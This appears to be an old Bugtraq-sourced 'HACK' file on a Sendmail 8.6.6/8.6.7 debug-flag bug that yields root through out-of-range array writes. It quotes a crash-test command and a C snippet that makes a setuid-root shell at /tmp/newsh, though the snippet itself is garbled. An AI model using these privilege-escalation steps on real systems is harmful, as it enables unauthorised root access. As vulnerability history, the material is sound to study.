************************************************************************** HACK: Sendmail 8.6.6/7: Use the -d flag to get a root shell System: Unix Source: Bugtraq ************************************************************************** 8.6.7/8.6.6 94/03/14 SECURITY: it was possible to get root access by using wierd values to the -d flag. Bonfield James reported the bug which allows one to enter a number greater than normal address space ranges that are used in its array index. % sendmail -d3294967296 "If this causes a segmentation fault then you'll likely have a bug in your version of sendmail. The problem is that numbers in this range may skip the range checks and result in accessing negative indexes into the debug array. Hence it is possible to write to locations in memory before the debug array I've tested this on the standard Solaris 2.3 distribution and have successfully obtained root access using this method. I have also tested on Ultrix 4.2A (apparently has no problem), DEC OSF/1 V1.2 (has a problem), and SunOS4.1 (also has a problem). I've spent some time on my solaris 2.3 workstation trying this script. It seems to me that you could change the default config file using the output of calc BUT that the solaris sendmail will execute the alias.sh script as users nobody in all the case. Could someone confirm that? The bug is slightly more difficult to abuse under solaris 2.x, but it is not impossible. The easy thing to do is change Mlocal to some arbitrary program that you want to run as root. The following example works just find. main() { suid(0); chown("/tmp/newsh",0,0); chmod("/tmp/newsh",04755)} Of course you have to copy some arbitrary program to /tmp/newsh before running this. Ps: Of course it does not mean that the solaris version is safe! I know of no sun4 version of sendmail that is safe from this bug. I have tested 8 versions of sun sendmail, including all the latest patches for both 4.1.3 and 2.3, and all are vulnerable.